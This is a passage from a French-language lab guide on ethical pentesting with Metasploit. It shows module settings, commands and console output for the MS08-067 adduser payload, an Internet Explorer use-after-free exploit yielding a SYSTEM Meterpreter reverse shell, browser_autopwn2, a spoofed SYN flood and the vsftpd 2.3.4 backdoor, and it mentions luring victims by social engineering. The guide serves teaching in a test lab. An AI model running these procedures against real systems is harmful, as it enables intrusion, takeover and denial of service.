# Name 	Disclos	ure Date Rank Check Description			
0 payload/windows/adduse	r	normal No Windows Execute net user /ADD			
Interact with a module by na	me or inde	x. For example info 0, use 0 or use payload/windows/adduser			
<u>msf6</u> exploit(windows/smb/ms0		pi) > set PAYLOAD payload/windows/adduser			
PAYLOAD => windows/adduser <u>msf6</u> exploit(<mark>windows/smb/ms@</mark>		pi) > options			
Module options (exploit/wind	ows/smb/ms	08_067_netapi):			
Name Current Setting	Required	Description			
RHOSTS 192.168.1.30 RPORT 445	yes yes	The target host(s), range CIDR identifier, or hosts file with The SMB service port (TCP)	syntax '	file: <pre>file</pre>	path>'
SMBPIPE BROWSER	yes	The pipe name to use (BROWSER, SRVSVC)			
Payload options (windows/add	user):				
Name Current Setting	Required	Description			
CUSTOM	no	 Custom group name to be used instead of default			
EXITFUNC thread	yes	Exit technique (Accepted: '', seh, thread, process, none)			
USER metasploit	yes ves	The username to create			
WMIC false	yes	Use WMIC on the target to resolve administrators group			
Exploit target:					
Id Name					
• Automatic Targeting					
<u>msf6</u> exploit(windows/smb/ms0	8_067_neta	pi) >			

Figure 10 utilisateurs machine victime

😫 Comptes d'utilisateurs		
🕝 Précédent 📀 🔮 Début		
Aide sur	Créer un nouveau compte	^
Comptes dutilisateurs Types de comptes d'utilisateurs Changer d'utilisateur	Modifier la manière dont les utilisateurs ouvrent et ferment une session ou choisissez un compte à modifier	
	Administrateur Administrateur de passe Fordinateur	10
	Golden wind Administrateur de fordinateur	
		~

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

4. Exploit browser/ie_execcommand_uaf :

Une vulnérabilité UAF (Use After free) est un type de faille de corruption de mémoire qui peut être exploitée pour exécuter du code arbitraire.

Cette vulnérabilité concerne tout programme qui utilise des pointeurs. En effet, si les programmeurs ont oublié de réinitialiser un pointeur après une libération de la mémoire et que le pointeur est utilisé plus tard, il pointera sur une zone mémoire non initialisée, mais exécutable.

En conséquence, le hacker pourrait y insérer ce dont il a envie puisque le pointeur initial pointera toujours sur la même zone mémoire.

4.1. Préparation :

Pour la préparation de cette attaque il faut savoir que la version 7 d'Internet Explorer est nécessaire sur la machine Windows XP SP3, car Internet Explorer version 8 relance plusieurs fois une requête en cas de non-réponse du serveur, ce qui résulte en un dysfonctionnement de l'attaque.



Figure11 : version utilisée de IE

4.2. Payload windows/meterpreter/reverse_tcp :

Nous allons utiliser le même payload que lors d'une attaque précédente pour des raisons de clarté.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

_					
I			ouail@KALI-portable: ~	۹ :	_ ¤ ×
<u>msf6</u> exploit(wind_uxf) > options		
Module optior	ıs (exploit/window	s/browser,	'ie_execcommand_uaf):		
Name	Current Setting	Required	Description		
OBFUSCATE SRVHOST	false 192.168.1.26	no yes	Enable JavaScript obfuscation The local host or network interface to lis	ten on. This	must be a
n address on	the local machine	or 0.0.0	0 to listen on all add resses.		
SRVPORT SSL SSLCert URIPATH	8080 false	yes no no no	The local port to listen on. Negotiate SSL for incoming connections Path to a custom SSL certificate (default The URI to use for this exploit (default i	is randomly g s random)	enerated)
Payload optic	ons (windows/meter	preter/rev	verse_tcp):		
Name	Current Setting	Required	Description		
EXITFUNC LHOST LPORT	thread 192.168.1.26 4444	yes yes yes	Exit technique (Accepted: '', seh, thread, The listen address (an interface may be spe The listen port	process, none cified))
Exploit targe	et:				
Id Name					
 0 Automa	atic				
msf6 exploit(* Exploit n sf6 exploit(* Using URI * Using URI * Server st msf6 exploit(windows/bronset/ running as backgro completed, but no (windows/browset/ reverse TCP handle : http://192.168. tarted. (windows/browset/	e exectant bund job 0 session wa e exectant r on 192.3 1.26:8080,	<pre>maid_unf) > exploit is created. und_unf) > 168.1.26:4444 'KfpCZoPAz und_unf) ></pre>		

Figure 12 : paramètre de l'Exploit ie execcommand uaf

Nous avons donc les paramètres de l'Exploit *windows/browser/ie_execcommand_uaf* ainsi que ceux du payload par défaut.

Le premier paramètre sur lequel nous nous concentrons sera le *SRVHOST* qui indique l'adresse qui attendra une réponse pour enclencher l'attaque. On l'utilise pour indiquer l'adresse publique, puis le port *SRVPORT* sur lequel Metasploit devrait écouter. Par défaut la valeur de srvhost est 0.0.0.0 quand nous attaquons une machine interne dans un réseau NAT. Nous pouvons aussi mettre l'adresse de la machine depuis laquelle on attaque (comme dans l'exemple ci-dessus) même si nous nous trouvons sur un NAT.

Ensuite nous lançons l'Exploit qui fera tourner l'exploitation en arrière-plan. En attendant un retour, l'attaque nous fournit une adresse URL que nous devrons envoyer à la victime pour qu'elle l'exécute grâce aux techniques de social engineering.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 13 : Exécution du lien sur Internet Explorer



Une fois l'exécution du lien sur Internet Explorer de la machine victime effectuée, il ne se passera rien sur l'application de la cible, Internet Explorer pourra même être quitté sans mettre en péril le processus du hacker, car il aura déjà pénétré la machine (image ci-dessous), et le processus du Meterpreter aura migré automatiquement sur le service *services.exe* qui a comme PID 732.

	ouail@KALI-portable: ~ Q					
<pre>[*] Server started. msf6 exploit(windows/browser/ie_execcemend_unf) > [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible e; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Redirecting to hGUZn.html [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] 192.168.1.116 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) [*] Sending stage (175174 bytes) to 192.168.1.116 [*] 192.168.1.126 if 192.168.1.26:4444 -> 192.168.1.116:1091) processing InitialAutoRunScript 'post/windows/manage/pri v_migrate' [*] Current session process is iexplore.exe (3260) as: MES-0116F59708E\dfqs [*] Session is Admin but not System. [*] Will attempt to migrate to specified System level process. [*] Trying services.exe (732) [*] Successfully migrated to services.exe (732) as: AUTORITE NT\SYSTEM [*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.116:1091) at 2021-08-30 20:28:53 +0200</pre>						
Active sessions ======						
Id Name Type	Information	Connection				
 1 meterpreter x86/w	indows MES-0116F59708E∖dfqs ∂ M 59708E	IES-0116F 192.168.1.26:4444 - 16:1091 (192.168.1	-> 192.168.1.1 .116)			
<u>msf6</u> exploit(<u>windows/browser/</u> [*] Starting interaction with	<pre>de_execcommand_uaf) > sessions 1 1</pre>					
<u>meterpreter</u> > getuid Server username: AUTORITE NT\ <u>meterpreter</u> >	SYSTEM					

Figure 14 : session Meterpreter de l'Exploit ie_execcommand_uaf lancée

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Voici le résultat de l'attaque. On peut remarquer qu'au moment où l'utilisateur a lancé la requête sur le lien fourni au préalable, Metasploit l'a détecté puis a vérifié si le navigateur était bien compatible avec l'attaque. Dans la ligne 5 (Mozilla/4.0 (compatible ; MSIE 7.0 ; Windows NT 5.1)). Nous pouvons nous apercevoir que nous sommes dans la machine de la cible avec une session Meterpreter qui a été mise en arrière-plan directement après s'être lancée.

Il est nécessaire de porter attention au fait que cet exploit occupe un port en mettant le Meterpreter en attente, ce qui résulterait à un échec d'exploitation au cas où nous relancerons l'attaque puisque le port sera occupé. Dans cet exemple c'est le port 4444.

La solution est donc de fermer le service qui tourne sur ce port. Pour résoudre ce problème, j'ai trouvé la commande suivante à exécuter : *Sudo kill \$(lsof -t -i :4444),* en indiquant le bon numéro de port en cas de changement.

5. Auxiliaire server/browser_autopwn2 :

Metasploit offre une attaque de browser automatique qui teste plusieurs navigateurs pour en trouver les faiblesses et les exploiter. Celle-ci consiste à préparer les meilleurs exploits qui concernent les navigateurs et les configurer automatiquement les uns après les autres. Elle attend la réponse d'un navigateur pour utiliser l'Exploit qui convient.

Cette attaque est une amélioration de sa prédécesseuse dans plusieurs domaines notamment le temps de lancement, la gestion des modules et la liste des exploits.

5.1. Préparation :

Ce module est spécial, en raison que l'attaque est la préparation en elle-même, nous verrons la cause dans la suite du guide.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure '	15 :	options	browser	autopwn2

Manie	Current Setting	Required	Description
EXCLUDE PATTERN		no	Pattern search to exclude specific modules
INCLUDE PATTERN		no	Pattern search to include specific modules
Retries	true	no	Allow the browser to retry the module
SRVHOST	192.168.1.26	yes	The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT	80	yes	The local port to listen on.
SSL	false	no	Negotiate SSL for incoming connections
SSLCert		no	Path to a custom SSL certificate (default is randomly generated)
URIPATH		no	The URI to use for this exploit (default is random)
Auxiliary action:			
Name Desc	ription		
		(1877 2)	1 4 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1

Nous allons chercher l'auxiliaire *server/browser_autopwn2*, le configurer comme sur l'image ci-dessus, en modifiant le *SRVHOST* qui sera l'IP de notre machine attaquante, puis le *SRVPORT* sur lequel nous attendons une réponse. Il est plus pratique d'utiliser le port 80, car c'est celui du *HTTP*, dans le but d'éviter de l'indiquer dans l'URL et pour que l'exercice soit donc le plus clair possible.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 16 :	lancement	du mod	ule browse	r auto	pwn2

<pre>msf6 auxiliary(cerver/browser_putopum2) > [e] Starting exploit modules [e] Starting listeners [e] Starting listeners [e] Using URL: http://192.168.1.26:80/WMFzegaAGF [e] The following is a list of exploits that BrowserAutoPwn will consider using. [e] Exploits with the highest ranking and newest will be tried first. Exploits ====================================</pre>		ouail@KALI-portal	ole: ~ Q 🚦	- • ×					
<pre>[*] The following is a list of exploits that BrowserAutoPwn will consider using. [*] Exploits with the highest ranking and newest will be tried first. Exploits ====================================</pre>	<pre>msf6 auxiliary(server/browser_autopun2) > [*] Starting exploit modules [*] Starting listeners [*] Time spent: 16.40544429 [*] Using URL: http://192.168.1.26:80/WMFzegaAGF</pre>								
ExploitsOrderRankNamePayload1Excellentfirefox_webidl_injectionfirefox/shell_reverse_tcp on 44422Excellentfirefox_orstring_console_injectionfirefox/shell_reverse_tcp on 44423Excellentfirefox_proto_crmfrequestfirefox/shell_reverse_tcp on 44425Excellentfirefox_proto_crmfrequestfirefox/shell_reverse_tcp on 44436Excellentsamsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 44437Greatadobe_flash_copy_pixels_to_byte_array_uafwindows/meterpreter/reverse_tcp on 44449Greatadobe_flash_ccasi32_int_overflowwindows/meterpreter/reverse_tcp on 444410Greatadobe_flash_ucompress_zlib_uafwindows/meterpreter/reverse_tcp on 444413Greatadobe_flash_bader_job_overflowwindows/meterpreter/reverse_tcp on 444414Greatadobe_flash_palet_bender_bofwindows/meterpreter/reverse_tcp on 444415Greatadobe_flash_palet_bender_bofwindows/meterpreter/reverse_tcp on 444416Greatadobe_flash_net_connection_confusionwindows/meterpreter/reverse_tcp on 444418Greatadobe_flash_nellymoser_bofwindows/meterpreter/reverse_tcp on 444419Greatadobe_flash_hader_damuing_tenwindows/meterpreter/reverse_tcp on 444415Greatadobe_flash_nellymoser_bofwindows/meterpreter/reverse_tcp on 444416Greatadobe_flash_hader_damuing_tenwindows/meterpreter/reverse_tcp on 444417Greatadobe	 The following is a list of exploits that BrowserAutoPwn will consider using. Exploits with the highest ranking and newest will be tried first. 								
OrderRankNamePayload1Excellentfirefox_webidl_injectionfirefox/shell_reverse_tcp on 44422Excellentfirefox_tostring_console_injectionfirefox/shell_reverse_tcp on 44423Excellentfirefox_svg_pluginfirefox/shell_reverse_tcp on 44424Excellentfirefox_proto_crmfrequestfirefox/shell_reverse_tcp on 44425Excellentsamsung_knox_smd_urlandroid/meterpreter/reverse_tcp on 44436Excellentsamsung_knox_smd_urlandroid/meterpreter/reverse_tcp on 44448Greatadobe_flash_domain_memory.uafwindows/meterpreter/reverse_tcp on 44449Greatadobe_flash_casi32_int_overflowwindows/meterpreter/reverse_tcp on 444410Greatadobe_flash_delete_range_tl_oposx/x86/shell_reverse_tcp on 444413Greatadobe_flash_shader_job_overflowwindows/meterpreter/reverse_tcp on 444414Greatadobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 444415Greatadobe_flash_neltymoser_bofwindows/meterpreter/reverse_tcp on 444416Greatadobe_flash_nellymoser_bofwindows/meterpreter/reverse_tcp on 444417Greatadobe_flash_hacking_team_uafwindows/meterpreter/reverse_tcp on 444419Greatadobe_flash_hacking_team_uafwindows/meterpreter/reverse_tcp on 444420Goodwellintech_kingscada_kxclientdownloadwindows/meterpreter/reverse_tcp on 444421Goodwellintech_kingscada_kxclientdownloadwindows/meterpreter	Exploits =======								
1Excellentfirefox_webidl_injectionfirefox/shell_reverse_tcp on 44422Excellentfirefox_svg_pluginfirefox/shell_reverse_tcp on 44423Excellentfirefox_proto_crmfrequestfirefox/shell_reverse_tcp on 44424Excellentfirefox_proto_crmfrequestfirefox/shell_reverse_tcp on 44425Excellentsamsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 44436Excellentsamsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 44447Greatadobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 44449Greatadobe_flash_casi32_int_overflowwindows/meterpreter/reverse_tcp on 444410Greatadobe_flash_delete_range_tl_oposx/x86/shell_reverse_tcp on 444413Greatadobe_flash_shader_job_overflowwindows/meterpreter/reverse_tcp on 444414Greatadobe_flash_shader_drawing_fillwindows/meterpreter/reverse_tcp on 444415Greatadobe_flash_nellymoser_bofwindows/meterpreter/reverse_tcp on 444416Greatadobe_flash_nellymoser_bofwindows/meterpreter/reverse_tcp on 444417Greatadobe_flash_nellymoser_bofwindows/meterpreter/reverse_tcp on 444419Greatadobe_flash_hacking_team_uafwindows/meterpreter/reverse_tcp on 444420Goodwellintech_kingscada_kxclientdownloadwindows/meterpreter/reverse_tcp on 444421Goodms14_064_ole_code_executionwindows/meterpreter/reverse_tcp on 4444	Order Rank	Name	Payload						
[+] Please use the following URL for the browser attack:	1Excellent1Excellent2Excellent3Excellent4Excellent5Excellent6Excellent7Great8Great10Great11Great12Great13Great14Great15Great16Great17Great18Great20Good21Good	<pre>firefox_webidl_injection firefox_tostring_console_injection firefox_tostring_console_injection firefox_proto_crmfrequest webview_addjavascriptinterface samsung_knox_smdm_url adobe_flash_domain_memory_uaf adobe_flash_copy_pixels_to_byte_array adobe_flash_copy_pixels_to_byte_array adobe_flash_delete_range_t1_op adobe_flash_delete_range_t1_op adobe_flash_shader_job_overflow adobe_flash_shader_drawing_fill adobe_flash_pixel_bender_bof adobe_flash_net_connection_confusion adobe_flash_net_connection_confusion adobe_flash_nacking_team_uaf wellintech_kingscada_kxclientdownload ms14_064_ole_code_execution</pre>	firefox/shell_reverse_tcp on 4442 firefox/shell_reverse_tcp on 4442 firefox/shell_reverse_tcp on 4442 firefox/shell_reverse_tcp on 4442 android/meterpreter/reverse_tcp on windows/meterpreter/reverse_tcp on windows/meterpreter/reverse_tcp on windows/meterpreter/reverse_tcp on osx/x86/shell_reverse_tcp on 4447 windows/meterpreter/reverse_tcp on windows/meterpreter/reverse_tcp on	4443 4444 4444 4444 4444 4444 4444 444					

En lançant le module avec *run* nous remarquons qu'il liste des exploits de navigateurs triés par un certain rang qu'il évalue lui-même. Il retourne ensuite un lien pour l'attaque (http://192.168.1.26:80/MWFzegaAGF) que nous allons lancer sur plusieurs machines, dont la machine Windows XP SP3.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 17 : browser_autopwn2 a détecté une potentielle cible

msf	6 auxiliary(serve	<pr browser_autopwnz)=""> [*] Gathering target information for 192.168.1.116</pr>
[*]	Sending HTML res	sponse to 192.168.1.116
[*]	192.168.1.116	adobe_flash_hacking_team_uaf - Request: /AwpfPlwtpmjB/nHtLJX/
[*]	192.168.1.116	adobe_flash_hacking_team_uaf - Sending HTML
[*]	192.168.1.116	adobe_flash_hacking_team_uaf - Request: /AwpfPlwtpmjB/nHtLJX/BixHG.swf
[*]	192.168.1.116	adobe_flash_hacking_team_uaf - Sending SWF
[*]	192.168.1.116	wellintech_kingscada_kxclientdownload - Requested: /mwxpZ/JFwewD/
[*]	192.168.1.116	wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx Act
ive	X Remote Code Exe	ecution
[*]	192.168.1.116	ms14_064_ole_code_execution - Sending exploit
[*]	192.168.1.116	ms14_064_ole_code_execution - Sending VBS stager
[*]	Session ID 1 (19	02.168.1.26:4444 -> 192.168.1.116:1090) processing InitialAutoRunScript 'migrate -f'
[1]	Meterpreter scri	pts are deprecated. Try post/windows/manage/migrate.
[1]	Example: run pos	st/windows/manage/migrate OPTION=value []
[*]	Current server p	process: ZvxhnRgIMQ.exe (1384)
[*]	Spawning notepad	l.exe process to migrate to
[+]	Migrating to 356	
[+]	Successfully mig	grated to process
[*]	Meterpreter sess	sion 1 opened (192.168.1.26:4444 -> 192.168.1.116:1090) at 2021-09-06 20:57:11 +0200

Ici, j'ai lancé le lien URL sur la machine Windows et j'obtiens la figure ci-dessus directement sur la machine où Metasploit tournait. On peut apercevoir que le module récolte des informations sur le navigateur et tente d'utiliser plusieurs exploits qui le concernent : il finira par nous notifier qu'une session Meterpreter a été migré sur un processus.



<u>msf6</u>	auxili	ary(server/browser_autopw	m2) > sessions	
Activ	e sess	ions		
Id	Name	Туре	Information	Connection
1		meterpreter x86/windows	MES-0116F59708E\dfqs @ MES-0116 F59708E	192.168.1.26:4444 -> 192.168.1. 116:1090 (192.168.1.116)

Finalement, en vérifiant les sessions nous trouvons bien celle qui a été démarrée par l'attaque. Dans le cas où, plusieurs machines exécutent la même URL, puis le module trouve un Exploit qui correspond pour chaque navigateur de ces dernières. Nous trouverons ici les sessions Meterpreter résultantes sous la forme d'une liste.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

6. Auxiliary dos/tcp/synflood (windows):

Les attaques DoS⁶ sont un type d'attaque qui n'a pas pour but cette fois de prendre le contrôle ou d'introduire dans un réseau, mais plutôt d'empêcher des utilisateurs d'accéder à un service en le corrompant et en bloquant les serveurs et les communications.

Il existe plusieurs types d'attaques DoS :

- Exploitation des vulnérabilités des machines en exécutant du code malveillant pour corrompre ces dernières.
- UDP Flooding, ce qui fonctionne en envoyant une énorme quantité de paquets
 UDP. Vu que ce trafic est prioritaire sur le trafic TCP, il finira par congestionner le réseau.
- SYN Flooding, celui que nous allons utiliser dans cet exercice. Elle consiste à envoyer beaucoup de demandes incomplètes à des serveurs clients. Cette attaque profite du système qui fonctionne de la manière suivante : la machine A envoie une demande syn, le serveur répond syn/ack et attend le ack de la part de la machine A : paquet or cette attaque profite de ce système en envoyant plein de paquets syn sans répondre avec les paquets ack. Le serveur finit donc par avoir plusieurs demandes sans réponses, et il consomme ainsi de plus en plus de ressource et jusqu'à finir par se planter.

6.1. Préparation :

Pour cette attaque, nous avons besoin de *Wireshark* sur notre machine Windows pour surveiller le trafic. De plus, il est nécessaire d'installer *tcpdump* sur notre machine Kali pour pouvoir envoyer ces paquets.

Ensuite, il faut exécuter un scan *nmap* sur la machine victime pour savoir quels ports sont ouverts comme sur la figure qui suit :

⁶ Distribution Denial Of Service, une attaque par déni de service en français.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

```
Figure 19: Nmap synflood
msf6 auxiliary(dos/tcp/synflood) > nmap 192.168.1.30
[*] exec: nmap 192.168.1.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 12:02 CEST
Nmap scan report for mes-0116f59708e.home (192.168.1.30)
Host is up (0.00037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds
```

6.2. Attaque :

Nous allons prendre un des ports ouverts, j'ai choisi le premier 135/tcp pour la suite de cette démonstration.

Après cela, on sélectionne l'auxiliaire *dos/tcp/synflood* puis nous allons remplir les paramètres qui nous intéressent dans la suite :

Name	Current Setting	Required	Description is considered blocksonbuggered Signa previous busil
INTERFACE		no	The name of the interface
NUM		no	Number of SYNs to send (else unlimited)
RHOSTS	192.168.1.30	yes	The target host(s), range CIDR identifier, or hosts file with syntax 'file: <path></path>
RPORT	135	yes	The target port
SHOST	192.168.1.6	no	The spoofable source address (else randomizes)
SNAPLEN	65535	yes	The number of bytes to capture
SPORT	666	no	The source port (else randomizes)
TIMEOUT	500	yes	The number of seconds to wait for new data

Les premiers paramètres à remplir sont *RHOSTS* et *RPORT*, qui seront les informations de la cible (son adresse IP ainsi que le port que nous voulons inonder). Ensuite nous avons *SHOST* et *SPORT*, qui seront les informations de la « source » sur les paquets qui seront envoyés à la victime.

Nous allons voir l'état de la machine cible avant de lancer l'attaque.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit



Figure 20 : État de la machine Windows avant l'attaque

En lançant le module avec *run*, il nous indique qu'il est en train d'inonder la cible. Nous allons vérifier cela avec Wireshark et le gestionnaire des tâches 5 minutes après avoir lancé l'attaque.



🙍 Capturing from Connexion au réseau local	[Wireshark 1.10.0 (SVN Re	v 49790 from /trunk-1.10)		
Eile Edit View Go Capture Analyze Statistics	Telephony Tools Internals He	lp .		
• • (= <u>d</u> = <u>b</u> × 2 •	⇔ ⇒ ⇒ ₹ £ ■ E	. Q. Q. 🖭 🖉	🖾 🥵 💥 💢	
Filter: tcp	Expr	ession Clear Apply Save		
No. Time Source	Destination Pro	tocol Length Info	numpers reuseu; uoom > epmap	[314] 360-0 W11-2003 Len-0
998804 1051.95983 192.168.1.6	192.168.1.30 тс	P 60 TCP Port	numbers reused] doom > epmap	[SYN] Seg=0 win=2344 Len=0
998805 1051.96020 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=2616 Len=0
998806 1051.96056 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=1159 Len=0
998807 1051.96095 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=2939 Len=0
998808 1051.96133 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=1608 Len=0
998809 1051.96169 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=4031 Len=0
998810 1051.96209 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=855 Len=0
998811 1051.96247 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=2630 Len=0
998812 1051.96284 192.168.1.6	192.168.1.30 TO	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=2747 Len=0
998813 1051.96322 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=1312 Len=0
998814 1051.96356 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=2839 Len=0
998815 1051.96395 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=2831 Len=0
998816 1051.96431.192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=2536 Len=0
998817 1051.96468 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=3539 Len=0
998818 1051.96510192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=438 Len=0
998819 1051.96547.192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=633 Len=0
998820 1051.96585 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=1973 Len=0
998821 1051.96621 192.168.1.6	192.168.1.30 TC	IP 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=3191 Len=0
998822 1051.96661 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 Win=2019 Len=0
998823 1051.96693 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=1014 Len=0
998824 1051.96729 192.168.1.6	192.168.1.30 TC	P 60 [TCP Port	numbers reused] doom > epmap	[SYN] Seq=0 win=1721 Len=0 🛛 🗸
0000 00 0c 29 bf ff 7c a0 48 1c 2	2 18 bc 08 00 45 00 .	.) .H ."E.		0
Connexion au réseau local: live capture in progre	Packets: 998824 · Displayed: 9893	25 (99.0%)		Profile: Default

Ici on remarque que la machine reçoit bel et bien énormément de paquets de la part de l'adresse et sur le port que nous avons indiqué comme « source » dans les paramètres du module (192.168.1.6).

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit



Figure 22 : État de la machine Windows après l'attaque

Cette figure nous montre que la machine est en train de se faire inonder et de consommer de plus en plus de ressources, ce qui va probablement saturer la machine à force, par conséquent l'attaque sera une réussite.

7. Exploit vsftpd_234_backdoor (linux) :

Ce backdoor a été introduit dans le *vsftpd-2.3.4.tar.gz* le 30 juin 2011 et enlevé le 3 juillet 2011. Le concept d'une attaque qui exploite cette faille est d'exécuter une fonction malveillante *vsf_sysutil_extra()*; dans le fichier mentionné auparavant en envoyant une séquence de bytes précise sur le port 21 qui résulterait une ouverture d'un backdoor sur le port 6200 de la machine cible.

7.1. Préparation :

Lancer la machine virtuelle Metasploitable2. Le nom d'utilisateur et le mot de passe sont : *msfadmin.* Pour rappel, cette machine est intentionnellement vulnérable à des fins de tests. Ensuite, il faut récupérer son adresse IP en exécutant *ifconfig*.

Pour ce qui est des informations supplémentaires de la machine sur laquelle on se trouve, la commande *cat /proc/cpuinfo* nous sera très utile, ainsi que *uname -m* pour en

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

connaître l'architecture (si le retour est x86_64 c'est qu'elle est en 64 bits, dans le cas inverse où cela nous retourne par exemple i686 ou i386 c'est qu'elle est en 32 bits).

7.2. Payload cmd/unix/interact :

Il s'agit du payload par défaut et du seul disponible pour cet Exploit : aucune configuration ou changement n'est donc nécessaire pour l'avoir.

Grâce au Nmap exécuté dans la figure 1.3 dans l'annexe 1, nous pouvons constater que le port 21 est bel et bien ouvert, et que sa version correspond exactement à celle de la faille *vsftpd_234_backdoor*. Nous allons donc procéder à l'attaque depuis notre machine Kali.

J'ai tout d'abord créé un répertoire nommé *PenTestTB* dans la machine victime pour la suite.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 23 : exploitation vsftpd



Nous commençons l'attaque par *search vsftpd* qui va nous trouver l'Exploit nécessaire, puis nous sélectionnons ensuite *use 0*. Le payload sera celui par défaut, cmd/unix/interact qui nous permettra d'avoir des interactions avec un Shell grâce à un socket connexion établie avec la victime.

Ensuite, le seul paramètre requis manquant est l'IP de la cible que nous configurons avec *set RHOSTS (adresse de la machine)*, puis pour finir, nous lançons l'attaque avec *Exploit.*

Durant l'attaque, notons que la machine du hacker passe par plusieurs étapes se résumant principalement par la création d'une session Shell. Juste en dessous nous nous retrouvons dans la machine Metasploitable2, ce que l'on peut confirmer en allant sur le répertoire */home/msfadmin/vulnerable*, et en affichant le contenu avec *ls* : nous

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

constatons ainsi la présence du dossier *PenTestTB* que j'ai créé auparavant, ce qui confirme le bon déroulement de l'attaque.

L'inconvénient dans cette attaque, c'est l'absence de l'autocomplétion depuis la machine de l'attaquant.

Pour quitter la session sans la fermer, il faut exécuter la commande *background* suivie d'un *y* : cela nous ramène dans la *msfconsole*. Dans le cas où il faut revenir sur la session, la commande *sessions -l* nous listera les sessions ouvertes avec un ID. Pour aller sur une session précise, il faut donc exécuter *sessions -i* (*id*).

Il est préférable d'éviter d'avoir plusieurs sessions lancées en même temps pour ne pas que cela porte à confusion et que ces exercices ne deviennent pas compliqués.

8. Exploit samba/usermap_script :

Pour commencer, il faut savoir que sont SMB et Samba.

SMB (Server Message Block) est un protocole qui fonctionne sur TCP sur le port 445. Il autorise la communication entre les processus et partage les ressources (imprimantes et fichiers) sur les réseaux locaux entre des ordinateurs qui tournent sous Windows et Unix.

